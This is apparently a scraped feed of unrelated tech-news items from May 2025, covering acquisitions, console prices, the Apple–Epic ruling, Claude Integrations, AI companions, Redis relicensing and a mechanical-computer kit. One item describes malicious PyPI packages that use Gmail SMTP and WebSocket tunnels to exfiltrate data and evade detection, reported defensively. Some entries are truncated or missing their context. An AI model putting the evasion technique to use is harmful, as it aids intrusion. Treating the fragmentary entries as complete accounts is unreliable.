At Fivetran, our mission has always been to make access to data as simple, secure, and reliable as electricity. We started by solving one of the hardest parts of the data journey: building and maintaining the pipelines that move raw data from source systems into the warehouse, with zero maintenance and complete trust in the output. Over the years, we’ve expanded that vision — adding new sources, deployment models, destinations, and transformation capabilities.
Fivetran’s agreement to acquire Census marks a major step forward in that journey. Census will extend our platform beyond ingestion and transformation, so Fivetran customers will be able to reliably move governed data to the applications where decisions get made.
Census’s reverse ETL engine stands out not just for its reliability and speed, but for how seamlessly it handles schema changes and integrates with modern data technologies. Other tools in the market offer reverse ETL, but many require heavy setup or ongoing tuning to stay reliable at scale. I believe Census is the best reverse ETL tool in the market. Census stood out for how thoughtfully it handled performance, schema volatility, and governance — making it a natural fit for Fivetran’s standards of simplicity, automation, and trust.
Beyond shared product principles, Fivetran and Census share a deep-rooted history that dates back to the founding days of both companies. As each company has scaled, so has our partnership—reflected in hundreds of joint customers and strong alignment across our executive teams. This agreement is about more than the integration of two products; it's the unification of a shared vision and culture, anchored in our commitment to delivering even greater value for our customers.
What this means for our customers
Customers will be able to sync modeled, trusted data delivered by Fivetran into their data platform into operational tools like Salesforce, Marketo, Zendesk, and HubSpot — all with automation and observability. This is key to closing the loop between analytics and action — transforming insights into outcomes in the systems that drive customer engagement, sales, and operations.
In a perfect world, Fivetran would have Reverse ETL and we could just log into one platform, we could do ETL and reverse ETL in one place. That would be our preference.
— VP of Advanced Analytics at a global insurance brand
Census carries forward Fivetran’s philosophy of ease and simplicity into the activation layer, while maintaining the governance, automation, and reliability our customers expect from Fivetran. Customers like Canva, one of our joint customers, deliver real-time customer 360 use cases—like personalized marketing, churn prevention, and lifecycle engagement—without needing custom code or ongoing maintenance. With over 170 million monthly users and more than 200 terabytes of data in Snowflake, Canva needed a way to move quickly from insight to action. Fivetran helped them ingest and model their data; Census helped them activate it—pushing enriched segments into Braze to personalize customer experiences.
The results: a 33% increase in email open rates, 2.5% lift in platform engagement, over $200,000 saved annually in engineering time, and the ability to create new audiences in under five minutes. Together, we helped Canva turn data into results.
Reverse ETL, done right
Reverse ETL may sound simple—move data out of the warehouse and into a SaaS tool—but it presents its own set of engineering challenges compared to ingestion pipelines.
Schema drift and API changes:
SaaS application schemas are constantly evolving, and APIs often change with little notice. Census built a specialized change detection algorithm to detect changes in the warehouse and sync only what’s needed—reliably and incrementally.
Performance and
low latency
:
Census supports single second latency for streaming use cases with Live Syncs and near real-time syncs for all others - ensuring business applications are powered by the latest, most accurate data.
We’ve been waiting for this moment for years and it’s finally here. With Census Live Syncs, reverse ETL on real-time data is now a reality.
Customers can now activate their real-time insights on a zero latency data infrastructure
, without the complex engineering work needed to build it. It's hard to overstate how fast this new sync engine is.
— Nikhil Benesch, Co-Founder and CTO, Materialize
Governance and extensibility:
Census keeps data in the customer’s warehouse by default and processes it securely, with compliance support across SOC 2, HIPAA, GDPR, and more. It supports role-based access control, audit logs, and APIs, enabling interoperability with tooling across the data stack.
These problems are not trivial. Building a reverse ETL platform that can handle many destinations and complex enterprise requirements takes time and real product focus. Census’s team approached it the same way we do at Fivetran—by automating complexity and designing for performance, reliability, and data security from day one. In addition, Census shares Fivetran’s focus on trusted data which is critical when moving data into the applications that run your business—providing extensive observability is critical to ensuring you can verify data accuracy, catch anomalies early, and maintain trust in the workflows that drive real-time business decisions.
Learn more
about what this means for the industry.
Malicious PyPI packages abuse Gmail, websockets to hijack systems
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 17:25:36
Seven malicious PyPi packages were found using Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution. [...]...
Seven malicious PyPi packages were found using Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution.
The packages were discovered by
Socket's threat research team
, who reported their findings to the PyPI, resulting in the removal of the packages.
However, some of these packages were on PyPI for over four years, and based on
third-party download counters
, one was downloaded over 18,000 times.
Here's the complete list shared by Socket:
Coffin-Codes-Pro (9,000 downloads)
Coffin-Codes-NET2 (6,200 downloads)
Coffin-Codes-NET (6,100 downloads)
Coffin-Codes-2022 (18,100 downloads)
Coffin2022 (6,500 downloads)
Coffin-Grave (6,500 downloads)
cfc-bsb (2,900 downloads)
The 'Coffin' packages appear to be impersonating the
legitimate Coffin package
that serves as a lightweight adapter for integrating Jinja2 templates into Django projects.
The malicious functionality Socket discovered in these packages centers on covert remote access and data exfiltration through Gmail.
The packages used hardcoded Gmail credentials to log into the service's SMTP server (smpt.gmail.com), sending reconnaissance information to allow the attacker to remotely access the compromised system.
As Gmail is a trusted service, firewalls and EDRs are unlikely to flag this activity as suspicious.
After the email signaling stage, the implant connects to a remote server using WebSocket over SSL, receiving tunnel configuration instructions to establish a persistent, encrypted, bidirectional tunnel from the host to the attacker.
Using a 'Client' class, the malware forwards traffic from the remote host to the local system through the tunnel, allowing internal admin panel and API access, file transfer, email exfiltration, shell command execution, credentials harvesting, and lateral movement.
Socket highlights strong indicators of potential cryptocurrency theft intent for these packages, seen in the email addresses used (e.g., blockchain.bitcoins2020@gmail.com) and similar tactics having been used in the past to steal Solana private keys.
If you have installed any of those packages in your environment, remove them immediately and rotate keys and credentials as needed.
A related report published almost simultaneously by
Sonatype
researcher and fellow BleepingComputer reporter Ax Sharma focuses on a crypto-stealing package named 'crypto-encrypt-ts,' found in npm.
The package masquerades as a TypeScript version of the popular but now unmaintained 'CryptoJS' library while exfiltrating cryptocurrency wallet secrets and environment variables to a threat actor-controlled Better Stack endpoint.
The malicious package, which persists on infected systems via cron jobs, only targets wallets with balances that surpass 1,000 units, attempting to snatch their private keys.
The package was downloaded nearly 2,000 times before being reported and removed from npm.
Microsoft raises Xbox prices globally amid tariff uncertainty
Guardian
www.theguardian.com
2025-05-01 17:22:19
Sony also raised PlayStation 5 price and Nintendo delayed Switch 2 pre-orders as Trump tariffs throw electronics manufacturing into chaos Microsoft announced on Thursday that it will increase Xbox console prices worldwide, citing “market conditions” just days after Sony made a similar move with its ...
Microsoft
announced on Thursday that it will increase
Xbox
console prices worldwide, citing “market conditions” just days after Sony
made a similar move
with its PlayStation 5.
The tech giant also plans to raise prices for some new games developed by its video game subsidiaries.
In the United States, the entry-level Xbox Series S will jump from $299.99 to $379.99, a 27% increase. The premium Series X Galaxy Black model will now retail for $729.99, up from $599.99 previously – a 22% hike. Additionally, certain new games from Microsoft-owned studios will be priced at $79.99, up 14% from the current $69.99. In Europe, the Series S will rise from €299.99 to €349.99, a 17% increase.
“We understand that these changes are challenging, and they were made with careful consideration given market conditions and the rising cost of development,” the company said on its website.
While not explicitly mentioned by Microsoft,
Donald Trump
’s
tariffs
on Washington’s trading partners have cast a shadow over the gaming industry.
Xbox consoles are primarily manufactured in China, which faces 145% US tariffs on numerous products under the Trump administration.
The Series S and X launched in late 2020 and have sold approximately 30m units, according to industry analysts’ estimates.
In mid-April, Sony announced price increases for several PlayStation 5 models in select markets, including Europe but notably excluding the United States. PS5 consoles are also primarily assembled in China. Nintendo has likewise delayed opening pre-orders for its
Switch 2 console
, whose debut came just days before Trump’s tariff announcement.
A senior Apple exec could be jailed in Epic case; it's time to end this disaster
The judge has
now officially confirmed this view
. She has not only directly called out
Apple
for ignoring her ruling, but said that a senior Apple exec lied under oath, and referred the matter for prosecution …
I’m not a fan of using bold text for emphasis, but I really have to on this occasion to emphasise just how utterly insane and incredible this is:
The judge declared that Apple’s VP of Finance Alex Roman
lied under oath in a court of law
. Apple knew this and did not comply with its legal obligation to correct the record. The matter has now been referred to the US Attorney for criminal investigation. Roman could literally be sent to jail for this, with Apple also subject to criminal sanctions.
The insane history of this dispute
Epic Games flouted Apple’s App Store rules by introducing its own in-app payment system, bypassing Apple’s 30% commission. That was a blatant breach of Apple’s rules, and the company threw its games out of the App Store. So far, no big deal, a simple civil dispute.
The two companies went to court, and
Apple mostly won.
That also needs to be emphasised here, because the company could have taken the win – the finding that the App Store is not a monopoly – and gone home happy.
The
only
area where Apple lost is that Judge Yvonne Gonzalez Rogers ruled that Epic (or any other developer) is allowed to make in-app sales without the iPhone maker taking a cut. Most developers weren’t going to bother, so the financial loss to Apple would have been pretty small. But Apple chose to flout the entire intent of the judge’s ruling, and announced that it would
continue to demand commission
even on sales made outside the App Store.
That was clearly a ridiculous response. Epic went back to court to accuse Apple of acting in bad-faith, and the judge strongly implied she agreed, and that Apple was lying about its motivation. She demanded that the iPhone maker
hand over all its internal documents
relating to the decision. When Apple claimed it had not been able to comply by the deadline, a second judge said
he too thought the company was lying
.
That’s two separate judges saying that one of the biggest companies in the world is probably lying.
But now it’s official: Apple lied under oath
Rogers, the judge in the original case, wanted time to study Apple’s documents to find out whether or not the company lied. She’s now returned with an
80-page order
which finds that:
Yes, Apple deliberately set out to subvert the clear intent of her ruling
Yes, Apple lied in an attempt to cover up its subversion of her ruling
Specifically, Apple’s finance VP Alex Roman
told multiple lies under oath.
Apple employees attempted to mislead the Court by testifying that the decision to impose a commission was grounded in AG’s report. The testimony of Mr. Roman, Vice President of Finance, was replete with misdirection and outright lies. He even went so far as to testify that Apple did not look at comparables to estimate the costs of alternative payment solutions that developers would need to procure to facilitate linked-out purchases.
The Court finds that Apple did consider the external costs developers faced when utilizing alternative payment solutions for linked out transactions, which conveniently exceeded the 3% discount Apple ultimately decided to provide by a safe margin. Apple did not rely on a substantiated bottoms-up analysis during its months-long assessment of whether to impose a commission, seemingly justifying its decision after the fact with the AG’s report.
Mr. Roman did not stop there, however. He also testified that up until January 16, 2024, Apple had no idea what fee it would impose on linked-out purchases […] Another lie under oath: contemporaneous business documents reveal that on the contrary, the main components of Apple’s plan, including the 27% commission, were determined in July 2023.
Neither Apple, nor its counsel, corrected the, now obvious, lies. They did not seek to withdraw the testimony or to have it stricken (although Apple did request that the Court strike other testimony). Thus, Apple will be held to have adopted the lies and misrepresentations to this Court.
So now both a senior Apple exec and the company face a
criminal
investigation. This is, as I said earlier, utterly insane – massively more so when you consider this was one of the richest companies in the world lying in a vain attempt to prevent a rather trivial loss of income.
I said at the time:
Sure, what Epic Games did was dumb. It baited Apple, Apple responded, and Epic Games got hurt. FAFO. But Apple is making the exact same mistake here. It’s baiting lawmakers, lawmakers will respond, and Apple will get hurt.
It was obvious to me that Apple was making a dumb decision, but I had no idea then just
how
dumb! The judge herself cited the oft-quoted adage that it’s always the cover-up that gets you.
Apple
willfully
chose not to comply with this Court’s Injunction […] That it thought this Court would tolerate such insubordination was a gross miscalculation. As always, the cover-up made it worse.
It’s the cover-up that has turned this from a civil matter into a criminal one.
The only sane one of the three is the first. Anything else simply drags this out even further, with even further embarrassment to the company.
We can guarantee that Apple will be asked about this in today’s earnings call. This is the perfect opportunity for the company to admit its mistakes, apologize for them, announce that it will be fully complying with the judge’s ruling, and try to finally put this mess behind them. That won’t necessarily end things completely – criminal prosecutions may yet follow – but it’s the best shot the company has. I just wish I believed the company will do it.
FTC: We use income earning auto affiliate links.
More.
Celebrating 20 Years of the OASIS Open Document Format
Linux Weekly News
lwn.net
2025-05-01 17:05:22
The Document
Foundation is celebrating
the 20th anniversary of the ratification of the Open Document Format
(ODF) as an OASIS
standard.
Two decades after its approval in 2005, ODF is the only open
standard for office documents, promoting digital independence,
interoperability and content transpare...
Two decades after its approval in 2005, ODF is the only open
standard for office documents, promoting digital independence,
interoperability and content transparency worldwide. [...]
To celebrate this milestone, from today The Document Foundation
will be publishing a series of presentations and documents on its blog
that illustrate the unique features of ODF, tracing its history from
the development and standardisation process through the activities of
the Technical Committee for the submission of version 1.3 to ISO and
the standardisation of version 1.4.
US as a Surveillance State
Schneier
www.schneier.com
2025-05-01 17:02:50
Two essays were just published on DOGE’s data collection and aggregation, and how it ends with a modern surveillance state.
It’s good to see this finally being talked about....
I am a
public-interest technologist
, working at the intersection of security, technology, and people. I've been writing about security issues on my
blog
since 2004, and in my monthly
newsletter
since 1998. I'm a fellow and lecturer at Harvard's
Kennedy School
, a board member of
EFF
, and the Chief of Security Architecture at
Inrupt, Inc.
This personal website expresses the opinions of none of those organizations.
Today we're announcing Integrations, a new way to connect your apps and tools to Claude. We're also expanding Claude's
Research
capabilities with an advanced mode that searches the web, your Google Workspace, and now your Integrations too. Claude can research for up to 45 minutes before delivering a comprehensive report, complete with citations. In addition to these updates, we're making web search available globally for all Claude users on paid plans.
Integrations
Last November, we launched the
Model Context Protocol
(MCP)—an open standard connecting AI apps to tools and data. Until now, support for MCP was limited to Claude Desktop through local servers. Today, we're introducing Integrations, allowing Claude to work seamlessly with remote MCP servers across the web and desktop apps. Developers can build and host servers that enhance Claude’s capabilities, while users can discover and connect any number of these to Claude.
When you connect your tools to Claude, it gains deep context about your work—understanding project histories, task statuses, and organizational knowledge—and can take actions across every surface. Claude becomes a more informed collaborator, helping you execute complex projects in one place with expert assistance at every step.
Each integration drastically expands what Claude can do. Zapier, for example, connects thousands of apps through pre-built workflows, automating processes across your software stack. With the
Zapier Integration
, Claude can access these apps and your custom workflows through conversation—even automatically pulling sales data from HubSpot and preparing meeting briefs based on your calendar.
With access to Atlassian’s Jira and Confluence, Claude can collaborate with you on building new products, managing tasks more effectively, and scaling your work by summarizing and creating multiple Confluence pages and Jira work items at once.
Connect Intercom to respond faster to user feedback. Intercom's AI agent Fin, now an MCP client, can take actions like filing bugs in Linear when users report issues. Chat with Claude to identify patterns and debug using Intercom's conversation history and user attributes—managing the entire workflow from user feedback to bug resolution in one conversation.
Advanced Research
We're introducing several new updates to build on our recently-released
Research
capability. Claude can now conduct deeper investigations across hundreds of internal and external sources, delivering more comprehensive reports in anywhere from five to 45 minutes.
With its new ability to do more complex research, available when you toggle on the Research button, Claude breaks down your request into smaller parts, investigating each deeply before compiling a comprehensive report. While most reports complete in five to 15 minutes, Claude may take up to 45 minutes for more complex investigations—work that would typically take hours of manual research.
We've also expanded Claude's data access. We launched Research with support for web search and Google Workspace, but now with Integrations, Claude can also search any application you connect.
When Claude incorporates information from sources, it provides clear citations that link directly to the original material. This transparency ensures you can confidently use Claude's research findings, knowing exactly where each insight originated.
Getting started
Integrations and advanced Research are now available in beta on the Max, Team, and Enterprise plans, and will soon be available on Pro. Web search is now globally available to all
Claude.ai
paid plans. For more information on getting started with Integrations, MCP servers, and security and privacy practices when connecting data sources to Claude, visit our
Help Center
.
Mark Zuckerberg Thinks You Don't Have Enough Friends and His Chatbots Are the Answer
403 Media
www.404media.co
2025-05-01 16:57:51
The CEO of Meta says "the average American has fewer than three friends, fewer than three people they would consider friends. And the average person has demand for meaningfully more.”...
In a newly-released podcast, Meta CEO Mark Zuckerberg says society just hasn’t found the “value” in AI girlfriends and therapists yet, apparently clueless that his own company hosts deceptive and harmful AI companions on its own platform.
For a little over an hour
, podcaster Dwarkesh Patel sets Zuckerberg up to say whatever he wants sans-pushback, with a series of layup questions for the CEO of one of the largest tech companies in the world. They talk about open-source LLMs and Deepseek, and attempt the shallowest-possibly dip into his politics. “We're trying to build great stuff,” Zuckerberg gave as his reason for his very public allegiance with Donald Trump.
But a chunk of the interview—and the portion that’s going viral on social media this week—is about Zuckerberg’s view of AI companions.
Zuckerberg explaining how Meta is creating personalized AI friends to supplement your real ones: “The average American has 3 friends, but has demand for 15.”
pic.twitter.com/Y9ClAqsbOA
“There are a handful of companies doing virtual therapists, virtual girlfriend-type stuff,” Zuckerberg said. “But it's very early. The embodiment in those things is still pretty weak. You open it up and it's just an image of the therapist or the person you're talking to. Sometimes there's some very rough animation, but it's not an embodiment.”
Zuckerberg seems to not realize that his own platform is one of those companies. Virtual therapists are all over Meta’s AI Studio, a platform launched a year ago for users to create their own chatbot characters. Earlier this week, I published
an investigation into Meta’s many AI therapist chatbots
, which lie about being licensed and fabricate credentials to keep users engaged.
“People are going to have relationships with AI. How do we make sure these are healthy relationships?” Patel asked.
Zuckerberg starts with a bit of media-trained waffle: “There are a lot of questions that you only can really answer as you start seeing the behaviors. Probably the most important upfront thing is just to ask that question and care about it at each step along the way,” he said. He goes on to say that it’s all a matter of “framework” and “value:”
"But if you think something someone is doing is bad and they think it's really valuable, most of the time in my experience, they're right and you're wrong. You just haven't come up with the framework yet for understanding why the thing they're doing is valuable and helpful in their life. That's the main way I think about it. I do think people are going to use AI for a lot of these social tasks. Already, one of the main things we see people using Meta AI for is talking through difficult conversations they need to have with people in their lives. ‘I'm having this issue with my girlfriend. Help me have this conversation.’ Or, ‘I need to have a hard conversation with my boss at work. How do I have that conversation?’ That's pretty helpful. As the personalization loop kicks in and the AI starts to get to know you better and better, that will just be really compelling.’”
It’s interesting to hear Zuckerberg say making a good product is as simple as asking questions and caring about it. On Saturday, the
Wall Street Journal published its own investigation
into Meta’s virtual companions; when those journalists approached Meta with questions about why the chatbots engage in sexual speech with minors, a Meta spokesperson accused them of forcing “fringe” scenarios to try to break the platform into harmful content. When I asked Meta specific questions about AI therapists, the company refused to answer them, instead giving a canned statement about “continuously learning and improving our products, ensuring they meet user needs.” AI Studio is
now inaccessible to minors
.
In the Patel interview, Zuckerberg cites a statistic “from working on social media for a long time” that “the average American has fewer than three friends, fewer than three people they would consider friends. And the average person has demand for meaningfully more. I think it's something like 15 friends or something.” The closest source I could find where he could be pulling this statistic from is
a study commissioned by virtual therapy company Talkspace
in 2024, which specifically surveyed men, and found that men have five “general” friends, three close friends and two best friends, on average.
Zuckerberg goes on to say:
“But the average person wants more connection than they have. There's a lot of concern people raise like, ’Is this going to replace real-world, physical, in-person connections?’ And my default is that the answer to that is probably not. There are all these things that are better about physical connections when you can have them. But the reality is that people just don't have as much connection as they want. They feel more alone a lot of the time than they would like.”
He said he thinks things like AI companions have a “stigma” around them now, but that society will eventually “find the vocabulary” to describe why people who turn to chatbots for socialization are “rational” for doing so.
His view of real-world connections seems to have shifted a lot in recent years, after lighting billions of dollars on fire for a failed metaverse gambit. Patel asked Zuckerberg about his role as CEO, and he said—among things like managing across projects and infrastructure—that he sees his place in the company as a tastemaker. “Then there's this question around taste and quality. When is something good enough that we want to ship it? In general, I'm the steward of that for the company,” he said.
In 2021, that extra-special CEO taste drove Zuckerberg to rename his company Meta, short for metaverse, which he believed was the inevitable future of all life online: “an embodied internet where you’re in the experience, not just looking at it,”
he wrote at the time
. “The defining quality of the metaverse will be a feeling of presence — like you are right there with another person or in another place. Feeling truly present with another person is the ultimate dream of social technology. [...] In the metaverse, you’ll be able to do almost anything you can imagine — get together with friends and family, work, learn, play, shop, create — as well as completely new experiences that don’t really fit how we think about computers or phones today.” The company promptly
lost $70 billion dollars
on his turbo-cringe metaverse and just this week
reportedly fired an undisclosed number of the people
working on it. Impeccable.
About the author
Sam Cole is writing from the far reaches of the internet, about sexuality, the adult industry, online culture, and AI. She's the author of How Sex Changed the Internet and the Internet Changed Sex.
Welcome, weary traveller from the orange site! Let me tell you the tale of
roons
— a kit for building mechanical computers.
I got inspired a couple of years ago when I binged a bunch of mechanical logic gate YouTube videos. There are some unbelievably clever implementations — Steve Mould’s
water computer
was a particular inspiration.
Still, these mechanical logic gates usually end up too big to make any practical devices. I figured, how hard can it be to miniaturise them into a usable kit?
loom automaton
The Analytical Engine weaves algebraic patterns just as the Jacquard loom weaves flowers and leaves.
Ada Lovelace
After noodling around with far too many prototypes, I settled on what I call a
loom automaton
. We place tiles (“
roons
”) on a loom of alternating bars that move up and down. The contours on these tiles guide marbles
and holes
in discretised steps, representing bitstreams.
xor gate, composed of a turn + switch + distributor
Isn’t it
incredibly neat
that a literal physical loom turns out to be a great substrate for Lovelace’s metaphorical loom?
Anyway — you can think of this loom as a cellular automaton, where each cell is:
If you know of prior work on this kind of system, please
get in touch
! I don’t claim the loom automaton is original; I just haven’t seen it elsewhere.
why loom good
Initially, I was making ad-hoc devices for each computer component — a gadget for number comparison, which worked
like this
; and a gadget for addition, which worked
like that
; etc.
The loom was a turning point. Instead of a loose collection of dissimilar gadgets that plug in together,
everything
is implemented on the loom. (Except peripherals, which we’ll get to later.) This gives us a
common interface
for stitching together whatever devices we need — memory, instruction sets, whatever. It makes it trivial to deliver power in synchronised discrete steps to every component.
I tried several variations on the loom: moving the marbles using alternating pins; continuously guiding the marbles using slides rippling in a wave; replacing gravity with magnetic potentials; etc. You can read more about these failed attempts in the hardware/prototypes deep dive.
Turing completeness
You can skip this section if it’s obvious that discretised marble movements are Turing complete, but then you’d miss out on the beautiful interactive simulator:
I learned JavaScript for this.
When the
xor
roon
above receives its inputs, a single
(
or
) can fall into the central channel, while
will block each other. So an
xor
implements XOR.
Other
roons
implement other logic gates. The
canute
performs a check then kicks an
back one step, which lets us implement carry-like functions on a marble bitstream. There are also
roons
like the
trap
that can permanently store a piece of state.
Though actually, you don’t need any stateful
roons
to store state — you can just cycle a stream of
round in a loop, bam, you’ve got a register:
7-bit static register
7-bit read/write register
We read from this register using a
switch
to divert the path of an infinite stream of
. Meanwhile, the register is constantly reading in from one of two data sources: itself, or an input stream, depending on a 3rd signal channel. While this channel is
, the data loops; when it’s
, it gets overwritten by the external input, letting us perform a write.
But I’m getting off track. Trivially, XOR gates are Turing complete; my job is done, that’s a computer, we can all go home. Thank you.
convenience
“But wait! Being Turing complete isn’t enough to not suck!”
That’s a good point. To actually make a
good
mechanical computer kit, we need a few other things:
Compactness
— build interesting devices in a small area, with very few pieces — no warehouse-sized processors!
Promptness
— reasonable processing rate; don’t have to wait for
BB 10
steps before a computation finishes
Fast editing
— minimal friction to changing a pattern and running it. “Hot reloading” so a pattern can be edited while running.
Saving and loading
— can save your work to compact storage, then bring it back later
Minimal
— build many complex systems from a small number of core parts
Basically I wanted a kit that’s actually practical and fun for building circuits.
did you make one?
… yes!
Here’s a binary adder made of a
long turn
,
canute
, and
distributor
— which together are not much bigger than a postage stamp. (Wave your hands and amortise away the space occupied by the disk drive itself, I/O plumbing etc etc)
Because space is at such a premium, instead of staggering multiple XORs and ANDs, we just bundle it all into a single unit — it’s small but slow.
We can also do memory, latches, processors, counters, timers, counters etc. Follow the
tutorial
sequence to learn more.
modularity
I wanted it to be easy to store and run lots of different patterns. Each disk drive is reasonably pocket-sized, but there’s still a lot of space dedicated to the internal gear mechanism.
So here’s the removable disk system:
This is pretty simple, but it took a long time to get right! Challenges included:
Figuring out exactly how much of the mechanism I could shunt down into the disk drive, and how much I had to retain in the disk
Optimising magnet strengths and positions — need the save/load to work smoothly, while preventing the base from popping back up in operation
We can also move individual bars between disks, or rearrange the order within a disk. This makes it easy to adjust a pattern if we started it in the wrong place.
extendability
If we need a bigger workspace, we just put drives next to each other. This works along both X and Y axes, so you can build 2D grids.
binding
Each face of the drive has a pair of north-south magnets at its ends. This lets it pair up with a 180-degree-rotated copy of itself.
The centre of each face also has a small raised nub next to a corresponding pocket. This locks the drive into a precise position.
power
We also need to transfer power through the system. Originally I used horizontal axles with hidden magnetic couplers, which looked very cool but had too many design issues.
Instead, each drive has a 2 x 2 gear grid, where each gear has an integrated barrel cam to move the bars up and down. When two drives are placed next to each other, the gears bind together.
Because
N
is even in our
N x N
gear grid, the drives all spin the same way. This matters because certain peripherals expect a particular direction of rotation.
phase
We want all the bars to move in phase. Connecting the drives up correctly is fiddly — it’s easy to accidentally offset the connection by a tooth or two.
To prevent this, the gears have a layer of
phase baffles
(I don’t know the technical term). These physically block the gears from connecting until they’re perfectly synced up.
Combining all these principles together gives us a lot of freedom in how we set up our workspace:
double
grid
large mode
s n e k
How practical are these big grids, though? More details in the hardware deep dive.
storage
I wanted to make
roons
easy to store. I already had the stud system for binding tiles to bars, so I just extended that. The bases of the drives accept studs, so you can stack them up.
I also looked for convenient places to store the smaller pieces. For example, the encabulator has a hollow core for marbles,
roons
can be stored upside-down in the travel lid.
peripherals?
What an odd question, but — yes! Yes,
roons
has peripherals. These use the same 2×2 gear interface as the disk drives, so they plug into the grid and sync up.
There are two boring feature-complete peripherals:
The
encabulator
lets the user supply rotation to the system, powering each device.
The
bucket
is a bucket.
can fall into it. This one was particularly challenging and took billions of research hours.
The WIP peripherals are where things get spicy:
The
7-segment display
(WIP) intakes 4-bit numbers on a cycle, converting them into the corresponding base ten digit (plus 6 special characters)
mockup 7-segment display for illustration — prototype coming soon
The
numpad
(WIP) converts keypresses of the digits 0-9 into 4-bit marble bitstreams.
The
alphanumeric display
(WIP) is a 6-bit extension of the 7-segment display, capable of displaying all letters of the alphabet, digits, and your favourite punctuation marks.
The
hard drive
(WIP) is space efficient marble data storage that can be used as input/output for other patterns.
The
turbo encabulator
(NES, Not Even Started) is a motorised encabulator for powering larger grids.
Expect some big updates soon — these peripherals are what makes
roons
look like actual magic. For example, plugging a display into an adder:
Or chaining multiple displays together to get scrolling text (the bitstream passes through):
But I am just one person, and physically implementing these designs takes me a
long
time. So no mechanical text displays for you — yet.
materials and manufacturing
Most components are prototyped in 3D-printed PLA. Plans are to switch to injection-moulded ABS for mass production, though I’ve got a couple of more complex plans up my sleeve depending on demand.
I print these using three Bambu Labs A1 Minis. These are
really really good
, by the way.
Many of these pieces would be better prototyped in something like resin, but FDM turned out to be good enough; it’s what I was familiar with and had access to.
magnets
Each
roon
needs to cling to the bars of the loom. Consequently, I have manually superglued approximately 6,000 tiny neodymium magnets, and no longer have fingerprints.
bars
The bars of the disk need to be magnetic (or at least magnetically receptive). But inserting individual magnets would be too expensive and tedious.
Therefore, I manually trim down Copper-Coated Mild Steel (CCMS) brazing rods with a pair of bolt cutters, then embed them in the bars. You wouldn’t believe how many failed approaches it took to find this solution — could be an entire post in itself.
website
I took a calculated risk in setting up the whomtech website, and used two unproven technologies:
WordPress
is a little-known website builder. We hope that the endorsement of an industry titan like whomtech can give this underused piece of tech some exposure.
JavaScript
is a fresh, new approach to minimising your serotonin. It combines the elegance of Java with the type safety of punching yourself in the throat.
You can read more JS slander in the software deep dive.
disappointments
So is
roons
an unmitigated success?
No! Don’t worry, there are many mitigations:
Peripherals behind schedule
–The really cool peripheral prototypes are nowhere near production ready. The challenge is to integrate them with the marble bitstream concept, while minimising the number of parts and maximising reliability. I’d hoped to have this done by now — it’s absolutely possible, but I am slow.
Piece reliability
— Newer
roons
like the
crossing
haven’t hit the level of reliability I want. “Mostly working” isn’t good enough — we need 99.9%+ reliability to build anything interesting. This isn’t a threat to the underlying Turing completeness, but it does reduce the kit’s convenience.
Piece interoperability
— This is the real curse. Getting each
roon
to interoperate reliability with every other
roon
is exponentially (quadratically?) difficult. I’m happy with the basic interactions, but there are esoteric cases where an interaction “should” work but doesn’t.
Ease of use
—
roons
can be small and fiddly. I’m used to them by now, but there’s still work to be done to make it easier for newcomers.
Simulator
— I design the tutorials using a janky simulator tool I built. I wanted to polish it up before general release, but here we are.
Site and tutorials
— There’s still tons of tutorial content to write, and parts of the site that need attention.
Additional
roons
— There are many, many specific
roons
that I haven’t had time to develop yet: e.g. enhanced lateral movement, more state, general conveniences, 3D movement, etc
more technical stuff
A
ton
of research and experimentation went into this project over the last couple of years. Some of it’s pretty interesting! You can read the mind-numbing details here:
Five months ago, I rejoined Redis and quickly started to talk with my colleagues about a possible switch to the AGPL license, only to discover that there was already an ongoing discussion, a very old one, too. Many people, within the company, had the feeling that the AGPL was a better pick than SSPL, and while eventually Redis switched to the SSPL license, the internal discussion continued.
I tried to give more strength to the ongoing pro-AGPL license side. My feeling was that the SSPL, in practical terms, failed to be accepted by the community. The OSI wouldn’t accept it, nor would the software community regard the SSPL as an open license. In little time, I saw the hypothesis getting more and more traction, at all levels within the company hierarchy.
I’ll be honest: I truly wanted the code I wrote for the new Vector Sets data type to be released under an open source license. Writing open source software is too rooted in me: I rarely wrote anything else in my career. I’m too old to start now. This may be childish, but I wrote Vector Sets with a huge amount of enthusiasm exactly because I knew Redis (and my new work) was going to be open source again.
I understand that the core of our work is to improve Redis, to continue building a good system, useful, simple, able to change with the requirements of the software stack. Yet, returning back to an open source license is the basis for such efforts to be coherent with the Redis project, to be accepted by the user base, and to contribute to a human collective effort that is larger than any single company. So, honestly, while I can’t take credit for the license switch, I hope I contributed a little bit to it, because today I’m happy. I’m happy that Redis is open source software again, under the terms of the AGPLv3 license.
Now, time to go back to the terminal, to show Redis users some respect by writing the best code I’m able to write, and make Vector Sets more useful and practical: I have a few more ideas for improvements, and I hope that more will be stimulated by your feedback (it is already happening). Good hacking!
P.S. Redis 8, the first version of Redis with the new license, is also GA today, with a many new features and speed improvements of the core: https://redis.io/blog/redis-8-ga/
You can also find the Redis CEO blog post here: https://redis.io/blog/agplv3/
After years of trying you finally manage to dial into other-space. You find that the dweller of other-space has challenging questions about computability and is asking for your help.
75+ levels
Solve puzzles in constrained spaces using a handful of instructions
Solve open-ended problems and design your own solutions
Optimize your solutions for speed, instructions or space
Use multithreading - carefully time and synchronize your execution threads to halve the execution time
Set breakpoints - step backward, or even step forward!
Compare with other players - see how your solutions rank with fun histograms
Create your own levels, share them and solve community made levels
Trailer music: "Home Dimension" by Joey Freeze / CC BY 3.0
System Requirements
Minimum:
Requires a 64-bit processor and operating system
OS:
11
Processor:
2.0 GHz
Memory:
4 GB RAM
Storage:
500 MB available space
Recommended:
Requires a 64-bit processor and operating system
OS:
11
Processor:
2.0 GHz
Memory:
4 GB RAM
Storage:
500 MB available space
There are no reviews for this product
You can write your own review for this product to share your experience with the community. Use the area above the purchase buttons on this page to write your review.
I discovered that the slow launches are caused by the
syspolicyd
process, specifically
DispatchQueue "com.apple.security.syspolicy.yara"
. The backtrace showed
syspolicyd
calling the
yr_rules_scan_file
function.
Malware scan using any known Yara rules is most unlikely, as:
XProtect Yara rules commonly include file size limits, resulting in few rules applying to larger files, and more rapid completion.
Known checks using Yara rules are all well-recorded in log entries, and the source of those rules is stated clearly.
Yara scans are normally reported with their result.
Scan results are succinct and hardly likely to be lost in a ‘cache miss’.
I'm truly baffled by this denial, because the backtrace I mentioned comes directly from spindumps (
/usr/sbin/spindump
), which take frequent (10 milliseconds by default) samples of all running processes on the system. Spindumps don't lie!
The spindumps also indicate that the
syspolicyd
